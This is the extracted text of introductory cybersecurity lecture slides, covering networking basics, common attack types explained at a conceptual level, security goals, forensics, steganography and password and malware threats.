MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

MODULE 1:

PRE-REQUISITES IN INFORMATION AND

NETWORK SECURITY

#SaeeJoshi

#CyberSecurity#SaeeJoshi 1

OVERVIEW OF

NETWORKING CONCEPTS #CyberSecurity


Agenda

Basics of Communication Systems

Transmission Media

Topology and Types of Networks

TCP/IP Protocol Stacks

Wireless Networks

The Internet


Basics of Communication Systems • The communication system is a system which describes the

information exchange between two points.

• The process of transmission and reception of information is

called communication.

• The major elements of communication are

the Transmitter of information, Channel or medium of

communication and the Receiver of information.


Block Diagram of Communication Systems


Elements Of Communication Systems

• Information

• Message or information is the entity that is to be transmitted. It can be in

the form of audio, video, temperature, picture, pressure, etc.

• Signal

• The single-valued function of time that carries the information. The

information is converted into an electrical form for transmission.

• Transducer

• A device or an arrangement that converts one form of energy to the

other. An electrical transducer converts physical variables such as

pressure, force, temperature into corresponding electrical signal

variations. Example: Microphone – converts audio signals into electrical

signals. Photodetector – converts light signals into electrical signals.

CyberSecurity#SaeeJoshi 6

Elements Of Communication Systems • Amplifier

• The electronic circuit or device that increases the amplitude or the strength of the transmitted signal is called an amplifier. When the signal strength becomes less than the required value, amplification can be done anywhere in between transmitter and receiver. A DC power source will provide for the amplification.

• Modulator • As the original message signal cannot be transmitted over a large

distance because of their low frequency and amplitude, they are superimposed with high frequency and amplitude wave called carrier wave. This phenomenon of superimposing of message signal with a carrier wave is called modulation. And the resultant wave is a modulated wave which is to be transmitted.

• Again there are different types of Modulation.

• Amplitude Modulation (AM)

• Frequency Modulation (FM)

• Phase Modulation (PM)


Elements Of Communication Systems

• Transmitter

• It is the arrangement that processes the message signal into a suitable

form for transmission and subsequently reception.

• Antenna

• An Antenna is a structure or a device that is radiate and receive

electromagnetic waves. So, they are used in both transmitters and

receivers. An antenna is basically a metallic object, often a collection of

wires. The electromagnetic waves are polarized according to the

position of the antenna.

• Channel

• A channel refers to a physical medium such as wire, cables, space

through which the signal is passed from transmitter to the receiver.

There are many channel impairments that affect the channel

performance to a pronounced level. Noise, Attenuation and distortion to

mention the major impairments.


Transmission Media • Transmission media is a communication channel that

carries the information from the sender to the receiver.

• It is a physical path between transmitter and receiver in

data communication.

• The main functionality of the transmission media is to carry

the information in the form of bits through network. Data is

transmitted through the electromagnetic signals.

• The electrical signals can be sent through the copper wire,

fiber optics, atmosphere, water, and vacuum.

• he characteristics and quality of data transmission are

determined by the characteristics of medium and signal.


Transmission Media • Transmission media is of two types are wired media and

wireless media. In wired media, medium characteristics are more important whereas, in wireless media, signal characteristics are more important.

• Different transmission media have different properties such as bandwidth, delay, cost and ease of installation and maintenance. • Bandwidth: All the factors are remaining constant, the greater the

bandwidth of a medium, the higher the data transmission rate of a signal.

• Transmission impairment: When the received signal is not identical to the transmitted one due to the transmission impairment. The quality of the signals will get destroyed due to transmission impairment.

• Interference: An interference is defined as the process of disrupting a signal when it travels over a communication medium on the addition of some unwanted signal.


Classification Of Transmission Media


Transmission Impairment


• Attenuation: Attenuation means the loss of energy, i.e., the strength of

the signal decreases with increasing the distance which causes the loss

of energy.

• Distortion: Distortion occurs when there is a change in the shape of the

signal. This type of distortion is examined from different signals having

different frequencies. Each frequency component has its own

propagation speed, so they reach at a different time which leads to the

delay distortion.

• Noise: When data is travelled over a transmission medium, some

unwanted signal is added to it which creates the noise.

Network Topology

• In computer networks, there are mainly two types of

topologies, they are:

• Physical Topology: A physical topology describes the way in

which the computers or nodes are connected with each other in a

computer network. It is the arrangement of various elements(link,

nodes, etc.), including the device location and code installation of a

computer network. In other words, we can say that it is the physical

layout of nodes, workstations, and cables in the network.

• Logical Topology: A logical topology describes the way, data flow

from one computer to another. It is bound to a network protocol and

defines how data is moved throughout the network and which path

it takes. In other words, it is the way in which the devices

communicate internally.


There are mainly six types of physical topology, they

are:

• Bus Topology

• Ring Topology

• Star Topology

• Mesh Topology

• Tree Topology

• Hybrid Topology

Now let us learn these topologies one by one


Network Topology : Types

• Bus topology is the simplest kind of topology in which a

common bus or channel is used for communication in the

network. The bus is connected to various taps and drop

lines.

• Taps are the connectors, while drop lines are the cables

connecting the bus with the computer. In other words,

there is only a single transmission line for all nodes.


Network Topology : Bus

• Ring topology is a topology in which each computer is

connected to exactly two other computers to form the

ring.

• The message passing is unidirectional and circular in

nature.


Network Topology : Ring

• Star topology is a computer network topology in which all

the nodes are connected to a centralized hub.

• The hub or switch acts as a middleware between the

nodes. Any node requesting for service or providing

service, first contact the hub for communication.


Network Topology : Star

• Mesh topology is a computer network topology in which nodes are interconnected with each other.

• In other words, direct communication takes place between the nodes in the network.

• There are mainly two types of Mesh: • Full Mesh: In which each node is connected to every other node in the

network.

• Partial Mesh: In which, some nodes are not connected to every node in the network.


Network Topology : Mesh

• Tree topology is a computer network topology in which all the

nodes are directly or indirectly connected to the main bus cable.

• Tree topology is a combination of Bus and Star topology.

• In a tree topology, the whole network is divided into segments,

which can be easily managed and maintained.

• There is a main hub and all the other sub-hubs are connected to

each other in this topology.


Network Topology : Tree

• A Hybrid topology is a computer topology which is a combination of two or more topologies. In practical use, they are the most widely used.

• In this topology, all topologies are interconnected according to the needs to form a hybrid. All the good features of each topology can be used to make an efficient hybrid topology.


Network Topology : Hybrid

………BREAK TIME……….. See You all in 5 min…….


Types of Network

• A communication network can be categorized by their size.

A communiction network is mainly of four types:

• LAN(Local Area Network)

• PAN(Personal Area Network)

• MAN(Metropolitan Area Network)

• WAN(Wide Area Network)


Types of Network :LAN(Local Area Network)

• Local Area Network is a group of computers connected to each other in a small area such as building, office.

• LAN is used for connecting two or more personal computers through a communication medium such as twisted pair, coaxial cable, etc.

• It is less costly as it is built with inexpensive hardware such as hubs, network adapters, and Ethernet cables.

• The data is transferred at an extremely faster rate in Local Area Network.

• Local Area Network provides higher security.


Types of Network :LAN(Local Area Network)


• LAN examples:

• Small company network

• Educational Labs

• Housing complex networks

Types of Network : PAN(Personal Area Network)

• Personal Area Network is a network arranged within an individual person, typically within a range of 10 meters.(typically called Home Networks )

• Personal Area Network is used for connecting the computer devices of personal use is known as Personal Area Network.

• Thomas Zimmerman was the first research scientist to bring the idea of the Personal Area Network.

• Personal Area Network covers an area of 30 feet.

• Personal computer devices that are used to develop the personal area network are the laptop, mobile phones, media player and play stations.


Types of Network : PAN(Personal Area Network)


• There are two types of Personal Area Network: • Wired Personal Area Network

• Wireless Personal Area Network

Types of Network : MAN(Metropolitan Area Network)


• A metropolitan area network is a network that covers a larger geographic area by interconnecting a different LAN to form a larger network.

• Government agencies use MAN to connect to the citizens and private industries.

• In MAN, various LANs are connected to each other through a telephone exchange line.

• The most widely used protocols in MAN are RS-232, Frame Relay, ATM, ISDN, OC-3, ADSL, etc.

• It has a higher range than Local Area Network(LAN).

Types of Network : MAN(Metropolitan Area Network)


Types of Network : WAN(Wide Area Network)


• A Wide Area Network is a network that extends over a large

geographical area such as states or countries.

• A Wide Area Network is quite bigger network than the LAN.

• A Wide Area Network is not limited to a single location, but

it spans over a large geographical area through a telephone

line, fiber optic cable or satellite links.

• The internet is one of the biggest WAN in the world.

• A Wide Area Network is widely used in the field of Business,

government, and education.

Types of Network : WAN(Wide Area Network)


• Examples Of Wide Area Network:

• Mobile Broadband

• A telecom company

• Private Network

TCP/IP Protocol Stacks • A network protocol is an established set of rules that

determine how data is transmitted between different devices in the same network.

• Essentially, it allows connected devices to communicate with each other, regardless of any differences in their internal processes, structure or design.

• TCP/IP is the world's most widely-used non-proprietary protocol suite because it enables computers using diverse hardware and software platforms, on different types of networks, to communicate.

• The protocols work equally well in both LANs and WANs.


TCP/IP Protocol Stacks • TCP/IP is a collection of protocols named after its two

best-known and most important protocols,

the Transmission Control Protocol (TCP) and the Internet

Protocol (IP).

• TCP/IP also includes several higher level protocols that

facilitate common applications such as electronic mail,

terminal emulation, and file transfer.

• The TCP/IP protocol suite can be modeled as a layered

protocol stack.

• It divides the protocols in four layers depending upon at

what level of data transfer processes they are used.


TCP/IP Protocol Stacks The TCP/IP model has four layers. From lowest to highest,

these are the link layer, the internet layer, the transport layer,

and the application layer, as shown below.


TCP/IP Protocol Layers


Wireless Networks • Wireless networks are computer networks that are not connected

by cables of any kind.

• The use of a wireless network enables enterprises to avoid the costly process of introducing cables into buildings or as a connection between different equipment locations.

• The basis of wireless systems are radio waves, an implementation that takes place at the physical level of network structure.

• There are four main types of wireless networks: • Wireless Local Area Network (LAN): Links two or more devices using a

wireless distribution method, providing a connection through access points to the wider Internet.

• Wireless Metropolitan Area Networks (MAN): Connects several wireless LANs.

• Wireless Wide Area Network (WAN): Covers large areas such as neighboring towns and cities.

• Wireless Personal Area Network (PAN): Interconnects devices in a short span, generally within a person’s reach.


Elements of Wireless Networks • Wireless Access Point

• A wireless communications hardware device that creates a central point of wireless connectivity. A wireless access point behaves much like a "hub" in that the total bandwidth is shared among all users for which the device is maintaining an active network connection.

• Wireless Port • Wireless ports provide both data and power service to the wireless

access point and are clearly distinguished from ordinary network ports by an affixed yellow warning label.

• Because wireless ports carry both data and electrical power, ordinary end-user devices could be severely damaged if they are connected to this type of port.

• Coverage Area • The geographical area in which acceptable wireless service quality is

attainable. Coverage areas for similar devices can vary significantly due to the presence of building materials, interference, obstructions, and access point placement.


Elements of Wireless Networks • Interference

• Degradation of a wireless communication radio signal caused by electromagnetic radiation from another source including other wireless access points, cellular telephones, microwave ovens, medical and research equipment, and other devices that generate radio signals. Interference can either degrade a wireless transmission or completely eliminate it entirely depending on the strength of the signal generated by the offending device.

• Privacy • The condition that is achieved by successfully maintaining the

confidentiality of personal, student, employee, and/or patient information transmitted over a wireless network.

• Security • Security is particularly important in wireless networks because data is

transmitted using radio signals that, without implementation of specific data encryption mechanisms, can easily be intercepted.


The Internet • The Internet is the most commonly used term in today’s world and

plays a very important role in the everyday life of people.

• Definition : “A global system of interconnected computers, using a

standardized Internet Protocol suite for communication and

sharing information is called the Internet.”

• The Internet completely revolutionized communication and

technology across the Globe. Initially, computerized devices were

only used for large industries but later its usage increased

massively.

• It is also mandatory for people to know that it is not possible for a

single person to develop something as broad and wide as the

Internet all by himself/herself.

• It was a combined effort of multiple researchers and programmers

that the Internet was discovered.


Ways To Connect To Internet The different ways in which one can connect to the Internet are discussed below in brief:

• Dial-Up – In such connections, users are required to link their phone line to a computer to access the Internet. Under this connection, the user cannot make or receive phone calls through tier home phone service

• Broadband – Provided either through cable or phone companies, Broadband is a high-speed internet connection which is widely used today

• Wireless Connection – Wi-fi and Mobile service providers fall under this category. Internet connectivity is made via radio waves and the Internet can be connected anywhere, irrespective of the location. Given below are a few examples of wireless connection: • Wi-fi – Wireless Fidelity or wi-fi allows high-speed internet connectivity without the

use of wires

• Mobile Phones – All smartphones are now equipped with an option for Internet connectivity which can be availed using Internet vouchers and packs. No external connection or wire is required for these

• Satellite – Where broadband connections are unavailable, satellites are used for wireless Internet connectivity

• Integrated Services Digital Network – ISDN allows users to sent audio or video data using telephone lines


Facts to know • The WWW

• The terms World Wide Web (WWW) and the Internet are so often used interchangeably that the fundamental difference between the two is easily forgotten.

• In simple words, WWW is just a common point of connectivity for information sharing that is facilitated by a global network of computers.

• The internet, on the other hand, is a connection between computers and countless other devices that form a huge network of systems.

• IP Address : • The Internet Protocol address is a numerical identification code assigned

for any device connected to a network. It acts as an identification interface for Internet users.

• Web Browser • A web browser is a software application for accessing the information on

the World Wide Web. The commonly used web browsers include Google Chrome, Internet Explorer, Mozilla Firefox, etc.


THANK YOU ALL ……….

Questions??????


MODULE 1:


NETWORK SECURITY

#SaeeJoshi


INFORMATION SECURITY

CONCEPTS #CyberSecurity


Agenda

Information Security Overview: Background and Current Scenario

Types of Attacks

Goals for Security

E-commerce Security

Computer Forensics

Steganography


Information Security • What is Information?

• Information can be anything like Your details or we can say your profile

on social media, your data in mobile phone, your biometrics etc.

• Information Security

• Information Security is not only about securing information from

unauthorized access.

• Information Security is basically the practice of preventing

unauthorized access, use, disclosure, disruption, modification,

inspection, recording or destruction of information.

• Thus Information Security spans so many research areas like

Cryptography, Mobile Computing, Cyber Forensics, Online Social

Media etc.


Information Security : History • Information security has come a very long way over the past

half a century.

• 1960s: Password protection

• It was during the 1960s when organizations first started to become more

protective of their computers. During this time, there was no internet or

network to worry about.

• So security was largely focused on more physical measures, and

preventing access to people with enough knowledge about how to work a

computer.

• 1970s: From CREEPER to Reaper

• New cyber history began with a research project during the 1970s, on what

was then known as the ARPANET (The Advanced Research Projects

Agency Network).

• A researcher named Bob Thomas created a computer program which was

able to move ARPANET‘s network, leaving a small trail wherever it went.

• This was edited by ―Ray Tomlinson‖ to create first computer virus. This

reviled many security flaws in ARPANET.



half a century. • 1980s: The internet goes mad

• During the 1980s, the ARPANET network also became more commonly known as the internet, and became available to the public as the worldwide web during 1989.

• With wide use of internet computer viruses became more advanced, and information security systems could not keep up with the constant barrage of innovative hacking approaches.

• 1990s: The rise of firewalls

• With the internet becoming available to the public, more and more people began putting their personal information online.

• Because of this, organized crime entities saw this as a potential source of revenue, and started to steal data from people and governments via the web.

• Firewalls and antivirus programs went some way to minimizing the risk of attacks, computer viruses and worms kept coming thick and fast, so hackers definitely had the upper hand at the time.



half a century.

• 2000s: Proper punishment

• In the early 2000s, governments began to clamp down on the criminality of

hacking, giving much more serious sentences to those culpable – including

extensive jail time and large fines.

• 2010s: The era of major breaches

• Due to the consistent rise of technology, hacking became ever more

complicated over the years that followed, and a number of major data

breaches now largely define the era.

• Information security is constantly improving, and many companies are

designing a vast array of novice attack mitigation options which utilize

things like Network Behavioral Analysis (NBA), web application firewalls

(WAF), and Denial of Service (DoS) protection.


Types of Cyber Attacks • A cyber attack is any type of offensive action that targets

computer information systems, infrastructures, computer networks

or personal computer devices, using various methods to steal,

alter or destroy data or information systems.

• We define 10 most common cyber attack types

• Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks

• Man-in-the-middle (MitM) attack

• Phishing and spear phishing attacks

• Drive-by attack

• Password attack

• SQL injection attack

• Cross-site scripting (XSS) attack

• Eavesdropping attack

• Birthday attack

• Malware attack


Cyber Attack : DoS & DDoS • 1. Denial-of-service (DoS) and distributed denial-of-service (DDoS)

attacks

• A denial-of-service attack overwhelms a system‘s resources so that it cannot respond to service requests.

• A DDoS attack is also an attack on system‘s resources, but it is launched from a large number of other host machines that are infected by malicious software controlled by the attacker.

• Unlike attacks that are designed to enable the attacker to gain or increase access, denial-of-service doesn‘t provide direct benefits for attackers.

• For some of them, it‘s enough to have the satisfaction of service denial. However, if the attacked resource belongs to a business competitor, then the benefit to the attacker may be real enough.

• Another purpose of a DoS attack can be to take a system offline so that a different kind of attack can be launched. One common example is session hijacking,

• There are different types of DoS and DDoS attacks; the most common are TCP SYN flood attack, teardrop attack, smurf attack, ping-of-death attack and botnets


Cyber Attack : DoS & DDoS • TCP SYN flood attack

• In this attack, an attacker exploits the use of the buffer space during a Transmission Control Protocol (TCP) session initialization handshake.

• The attacker‘s device floods the target system‘s small in-process queue with connection requests, but it does not respond when the target system replies to those requests.

• This causes the target system to time out while waiting for the response from the attacker‘s device, which makes the system crash or become unusable when the connection queue fills up.

• Smurf attack • This attack involves using IP spoofing and the ICMP to saturate a target

network with traffic. This attack method uses ICMP echo requests targeted at broadcast IP addresses. These ICMP requests originate from a spoofed ―victim‖ address. For instance, if the intended victim address is 10.0.0.10, the attacker would spoof an ICMP echo request from 10.0.0.10 to the broadcast address 10.255.255.255. This request would go to all IPs in the range, with all the responses going back to 10.0.0.10, overwhelming the network. This process is repeatable, and can be automated to generate huge amounts of network congestion.


Cyber Attack : DoS & DDoS • Ping of death attack

• This type of attack uses IP packets to ‗ping a target system with an IP size

over the maximum of 65,535 bytes. IP packets of this size are not allowed,

so attacker fragments the IP packet. Once the target system reassembles

the packet, it can experience buffer overflows and other crashes.

• Botnets

• Botnets are the millions of systems infected with malware under hacker

control in order to carry out DDoS attacks. These bots or zombie systems

are used to carry out attacks against the target systems, often

overwhelming the target system‘s bandwidth and processing capabilities.

These DDoS attacks are difficult to trace because botnets are located in

differing geographic locations

• Teardrop attack

• This attack causes the length and fragmentation offset fields in sequential

Internet Protocol (IP) packets to overlap one another on the attacked host;

the attacked system attempts to reconstruct packets during the process

but fails. The target system then becomes confused and crashes.


Cyber Attack : MitM • Man-in-the-middle (MitM) attack

• A MitM attack occurs when a hacker inserts itself between the communications of a client and a server. Here are some common types of man-in-the-middle attacks:

• Here are some common types of man-in-the-middle attacks: • Session hijacking

• an attacker hijacks a session between a trusted client and network server. The attacking computer substitutes its IP address for the trusted client while the server continues the session, believing it is communicating with the client.

• IP Spoofing

• IP spoofing is used by an attacker to convince a system that it is communicating with a known, trusted entity and provide the attacker with access to the system. The attacker sends a packet with the IP source address of a known, trusted host instead of its own IP source address to a target host. The target host might accept the packet and act upon it.

• Replay

• A replay attack occurs when an attacker intercepts and saves old messages and then tries to send them later, impersonating one of the participants. This type can be easily countered with session timestamps or nonce (a random number or a string that changes with time).


Cyber Attack : Phishing • Phishing and spear phishing attacks

• Phishing attack is the practice of sending emails that appear to be

from trusted sources with the goal of gaining personal information or

influencing users to do something.

• It combines social engineering and technical trickery. It could involve

an attachment to an email that loads malware onto your computer.

• It could also be a link to an illegitimate website that can trick you into

downloading malware or handing over your personal information.

• Spear phishing is a very targeted type of phishing activity. Attackers

take the time to conduct research into targets and create messages

that are personal and relevant.

• Because of this, spear phishing can be very hard to identify and even

harder to defend against.


Cyber Attack : Drive-by • Drive-by download attacks are a common method of

spreading malware.

• Hackers look for insecure websites and plant a malicious script into

HTTP or PHP code on one of the pages. This script might install

malware directly onto the computer of someone who visits the site, or it

might re-direct the victim to a site controlled by the hackers.

• Drive-by downloads can happen when visiting a website or viewing an

email message or a pop-up window.

• Unlike many other types of cyber security attacks, a drive-by doesn‘t

rely on a user to do anything to actively enable the attack — you don‘t

have to click a download button or open a malicious email attachment

to become infected.


Cyber Attack : Password • Because passwords are the most commonly used mechanism to

authenticate users to an information system, obtaining passwords is a common and effective attack approach.

• Access to a person‘s password can be obtained by looking around the person‘s desk, ‗‗sniffing‘‘ the connection to the network to acquire unencrypted passwords, using social engineering, gaining access to a password database or outright guessing

• The last approach can be done in either a random or systematic manner: • Brute-force password guessing means using a random approach by

trying different passwords and hoping that one work Some logic can be applied by trying passwords related to the person‘s name, job title, hobbies or similar items.

• In a dictionary attack, a dictionary of common passwords is used to attempt to gain access to a user‘s computer and network. One approach is to copy an encrypted file that contains the passwords, apply the same encryption to a dictionary of commonly used passwords, and compare the results.


Cyber Attack : SQL injection • SQL injection has become a common issue with database-

driven websites.

• It occurs when a malefactor executes a SQL query to the

database via the input data from the client to server.

• SQL commands are inserted into data-plane input (for

example, instead of the login or password) in order to run

predefined SQL commands.

• A successful SQL injection exploit can read sensitive data

from the database, modify (insert, update or delete)

database data, execute administration operations (such as

shutdown) on the database, recover the content of a given

file, and, in some cases, issue commands to the operating

system.


Cyber Attack : Cross-site scripting (XSS)

• XSS attacks use third-party web resources to run scripts in

the victim‘s web browser or scriptable application.


Cyber Attack : Eavesdropping • Eavesdropping attacks occur through the interception of

network traffic.

• By eavesdropping, an attacker can obtain passwords, credit

card numbers and other confidential information that a user

might be sending over the network.

• Eavesdropping can be passive or active

• Passive eavesdropping — A hacker detects the information by

listening to the message transmission in the network.

• Active eavesdropping — A hacker actively grabs the information by

disguising himself as friendly unit and by sending queries to

transmitters. This is called probing, scanning or tampering


Cyber Attack : Birthday • Birthday attacks are made against hash algorithms that are

used to verify the integrity of a message, software or digital

signature.

• A message processed by a hash function produces a

message digest (MD) of fixed length, independent of the

length of the input message; this MD uniquely characterizes

the message.

• The birthday attack refers to the probability of finding two

random messages that generate the same MD when

processed by same hash function.


Cyber Attack : Malware • Malicious software can be described as unwanted software

that is installed in your system without your consent.

• Here are some of the most common types of malware: • Macro viruses — These viruses infect applications such as Microsoft

Word or Excel. Macro viruses attach to an application‘s initialization sequence. When the application is opened, the virus executes instructions before transferring control to the application. The virus replicates itself and attaches to other code in the computer system.

• File infectors — File infector viruses usually attach themselves to executable code, such as .exe files. The virus is installed when the code is loaded. Another version of a file infector associates itself with a file by creating a virus file with the same name, but an .exe extension. Therefore, when the file is opened, the virus code will execute.

• System or boot-record infectors — A boot-record virus attaches to the master boot record on hard disks. When the system is started, it will look at the boot sector and load the virus into memory, where it can propagate to other disks and computers.


Goals of Information Security • Information Security programs are build around 3 objectives,

commonly known as CIA – Confidentiality, Integrity, Availability. • Confidentiality – means information is not disclosed to unauthorized

individuals, entities and process.

• For example if we say I have a password for my Gmail account but someone saw while I was doing a login into Gmail account. In that case my password has been compromised and Confidentiality has been breached.

• Integrity – means maintaining accuracy and completeness of data. This means data cannot be edited in an unauthorized way.

• For example if an employee leaves an organization then in that case data for that employee in all departments like accounts, should be updated to reflect status to JOB LEFT so that data is complete and accurate and in addition to this only authorized person should be allowed to edit employee data.

• Availability – means information must be available when needed.

• For example if one needs to access information of a particular employee to check whether employee has outstand the number of leaves, in that case it requires collaboration from different organizational teams like network operations, development operations, incident response and policy/change management.


Goals of Information Security • Apart from this there are more principles that governs

information security programs.

• Non repudiation – means one party cannot deny receiving a message

or a transaction nor can the other party deny sending a message or a

transaction.

• Authenticity – means verifying that users are who they say they are

and that each input arriving at destination is from a trusted source. This

principle if followed guarantees the valid and genuine message received

from a trusted source through a valid transmission.

• Accountability – means that it should be possible to trace actions of an

entity uniquely to that entity.


E-commerce Security • Security is an essential part of any transaction that takes place over the

internet. Customers will lose his/her faith in e-business if its security is compromised.

• Following are the essential requirements for safe e-payments/transactions : • Confidentiality − Information should not be accessible to an unauthorized person. It

should not be intercepted during the transmission.

• Integrity − Information should not be altered during its transmission over the network.

• Availability − Information should be available wherever and whenever required within a time limit specified.

• Authenticity − There should be a mechanism to authenticate a user before giving him/her an access to the required information.

• Non-Reputiability − It is the protection against the denial of order or denial of payment. Once a sender sends a message, the sender should not be able to deny sending the message. Similarly, the recipient of message should not be able to deny the receipt.

• Encryption − Information should be encrypted and decrypted only by an authorized user.

• Auditability − Data should be recorded in such a way that it can be audited for integrity requirements.


E-commerce Security

• Major security measures taken by all e-commerce website are

following −

• Encryption − It is a very effective and practical way to safeguard the

data being transmitted over the network. Sender of the information

encrypts the data using a secret code and only the specified receiver can

decrypt the data using the same or a different secret code.

• Digital Signature − Digital signature ensures the authenticity of the

information. A digital signature is an e-signature authenticated through

encryption and password.

• Security Certificates − Security certificate is a unique digital id used to

verify the identity of an individual website or user.


E-commerce Security : Security Protocols • Secure Socket Layer (SSL)

• It is the most commonly used protocol and is widely used across the industry. It meets following security requirements −

• Authentication

• Encryption

• Integrity

• Non-reputability

• "https://" is to be used for HTTP urls with SSL, where as "http:/" is to be used for HTTP urls without SSL.

• Secure Hypertext Transfer Protocol (SHTTP) • SHTTP extends the HTTP internet protocol with public key encryption,

authentication, and digital signature over the internet.

• Secure HTTP supports multiple security mechanism, providing security to the end-users.

• SHTTP works by negotiating encryption scheme types used between the client and the server.


Computer Forensics

• Computer forensics is the process of methodically examining

computer media (hard disks, diskettes, tapes, etc.) for

evidence.

• In other words, computer forensics is the collection,

preservation, analysis, and presentation of computer-related

evidence.

• Computer forensics also referred to as computer forensic

analysis, electronic discovery, electronic evidence discovery,

digital discovery, data recovery, data discovery, computer

analysis, and computer examination.

• Computer evidence can be useful in criminal cases, civil

disputes, and human resources/ employment proceedings.


Computer Forensics

• Computer forensics assists in Law Enforcement. This can

include:

• Recovering deleted files such as documents, graphics, and photos.

• Searching unallocated space on the hard drive, places where an

abundance of data often resides.

• Tracing artifacts, those tidbits of data left behind by the operating

system. Our experts know how to find these artifacts and, more

importantly, they know how to evaluate the value of the information

they find.

• Processing hidden files — files that are not visible or accessible to the

user — that contain past usage information. Often, this process

requires reconstructing and analyzing the date codes for each file and

determining when each file was created, last modified, last accessed

and when deleted.

• Running a string-search for e-mail, when no e-mail client is obvious.


Steganography • Given the amount of data that is being generated and transmitted

electronically in the world today, it‘s no surprise that numerous methods of protecting that data have evolved. One of the rapidly growing methods is steganography.

• Steganography is the art and science of embedding secret messages in a cover message in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message


Steganography Techniques

• Depending on the Steganography Techniques

• nature of the cover object(actual object in which secret data

is embedded), steganography can be divided into five types:

• Text Steganography : Text Steganography is hiding information inside

the text files.

• It involves things like changing the format of existing text, changing

words within a text, generating random character sequences or using

context-free grammars to generate readable texts

• Image Steganography : Hiding the data by taking the cover object as

the image is known as image steganography.

• In digital steganography, images are widely used cover source

because there are a huge number of bits present in the digital

representation of an image.


Steganography Techniques

• Audio Steganography : In audio steganography, the secret message is embedded into an audio signal which alters the binary sequence of the corresponding audio file.

• Hiding secret messages in digital sound is a much more difficult process when compared to others, such as Image Steganography.

• Video Steganography : In Video Steganography you can hide kind of data into digital video format.

• The advantage of this type is a large amount of data can be hidden inside and the fact that it is a moving stream of images and sounds.

• You can think of this as the combination of Image Steganography and Audio Steganography.

• Two main classes of Video Steganography include: • Embedding data in uncompressed raw video and compressing it later

• Embedding data directly into the compressed data stream

• Network Steganography / Protocol Steganography :

• It is the technique of embedding information within network control protocols used in data transmission such TCP, UDP, ICMP etc.

• You can use steganography in some covert channels that you can find in the OSI model. For Example, you can hide information in the header of a TCP/IP packet in some fields that are either optional.



Questions??????


MODULE 1:


NETWORK SECURITY

#SaeeJoshi


SECURITY THREATS AND

VULNERABILITIES #CyberSecurity


Agenda Overview of Security threats

Weak / Strong Passwords and Password Cracking

Insecure Network connections

Malicious Code

Programming Bugs

Cyber crime and Cyber terrorisme

Information Warfare and Surveillance


Overview of Security threats • A network security threat is an effort to obtain illegal admission to

your organization’s network, to take your data without your knowledge, or execute other malicious pursuits.

• Your network security is at risk or vulnerable if or when there is a weakness or vulnerability within your computer network.

• Some network security threats are intended to upset your organization’s processes and functionality instead of noiselessly collecting information for espionage or financial motives.

• With the extensive use and accessibility of the internet, comes the increase in all kinds of threats. The most prevalent technique is the Denial of Service (DoS) attack.

• Having the essential mechanisms and tools to identify and categorize network security threats and irregularities in your system or network is critical.


What are network vulnerabilities? • Network vulnerabilities are known flaws or weaknesses in

hardware, software, or other organizational assets, which can be exploited by attackers.

• When your network security is compromised by a threat, it can lead to a severe security breach.

• Most network security vulnerabilities are often abused by computerized attackers rather than human typing on your network.

• There are four main types of network security threats • Structured threats

• Unstructured threats

• External threats

• Internal threats

• Lets see some major security threats that make systems vurnerable.


Weak / Strong Passwords • Weak passwords always play a major role in any hack. For the

ease of user, sometime applications do not enforce password complexity and as a result of that users use simple passwords such as :

password, password123, Password@123, 12345, god, own mobile number etc.

• Strong password is one that is more secure by virtue of being difficult for a machine or a human to guess.

• Password strength can be achieved by incorporating the following characteristics; the more characteristics you incorporate into your password, the stronger it will be. • At least 8 characters—the more characters, the better

• A mixture of both uppercase and lowercase letters

• A mixture of letters and numbers

• Inclusion of at least one special character, e.g., ! @ # ? ] Note: do not use < or > in your password, as both can cause problems in Web browsers


Password cracking

• Application authentication that only requires a login and password is inherently unsecure, because an attacker only needs to obtain “one factor” to masquerade as a legitimate user.

• Often it is easy to guess legitimate login ids by doing some reconnaissance on the target of the attack.

• Many companies will re-use employee’s email ids (without the domain name) as a universal login for other systems in the company. Email addresses can be discovered from many online sources.

• Additionally, users will often use unsecure passwords, because they are easier to remember. A company will often dictate rules for password complexity, but users will still tend to follow those rules in such a way that their passwords will be easier for them to remember.


Insecure Network connections • In the world of Wi-Fi, there are two types of networks, secured and

unsecured. The primary difference between secure and unsecure networks is the ability to connect without a password. This means virtually anyone with proximity to the network can connect.

• Unsecure networks often lack any sort of anti-virus or firewall protection and any information transmitted across the network is floating around unencrypted for someone to grab.

• The threats an Unsecure Network pose : • Information Vulnerability

• Malware Distribution

• Wi-Fi Honeypots (fake wireless network)

• Man in the Middle (MITM) Attack

• To avoid these threats avoid using open Wi-Fi connections, also following may help : • Personal Antivirus or Firewall

• Virtual Desktop Infrastructure (VDI) govern by central server.


Malicious Code • What is malicious code?

• Malicious code is unwanted files or programs that can cause harm to a computer or compromise data stored on a computer. Various classifications of malicious code include viruses, worms, and Trojan horses. • Viruses have the ability to damage or destroy files on a computer system and are

spread by sharing an already infected removable media, opening malicious email attachments, and visiting malicious web pages.

• Worms are a type of virus that self-propagates from computer to computer. Its functionality is to use all of your computer’s resources, which can cause your computer to stop responding.

• Trojan Horses are computer programs that are hiding a virus or a potentially damaging program. It is not uncommon that free software contains a Trojan horse making a user think they are using legitimate software, instead the program is performing malicious actions on your computer.

• Malicious data files are non-executable files—such as a Microsoft Word document, an Adobe PDF, a ZIP file, or an image file—that exploits weaknesses in the software program used to open it. Attackers frequently use malicious data files to install malware on a victim’s system, commonly distributing the files via email, social media, and websites.


Malicious Code

• How can you protect yourself against malicious code?

• Install and maintain antivirus software

• Use caution with links and attachments

• Block pop-up advertisements

• Use an account with limited permissions

• Disable external media AutoRun and AutoPlay features

• Change your passwords periodically

• Keep software updated

• Back up data regularly

• Install or enable a firewall

• Use anti-spyware tools

• Monitor accounts

• Avoid using public Wi-Fi


Programming Bugs

• A programming bug or software bug is nothing like a pesky

worm or virus. Instead, it's an error or mistake that causes a

computer program to misbehave.

• These bugs are generally the result of mistakes made by

the programmer either in the design or the source code.

• Some are caused by compilers that generated invalid code.

• While programming bugs themselves aren't malicious, they

can be very dangerous.

• They can make your entire system weak and vulnerable to

cyber attacks.

• The computer software industry has taken note of this with

strides to become more efficient at development.


Programming Bugs

• Some of these measures include the following. • Programming Style

• Although common mistakes such as typos are usually found by the compiler, a programming bug often appears when logical errors are made. Innovations in defense programming and programming style are intended to make these errors less likely and easier to notice.

• Programming Techniques

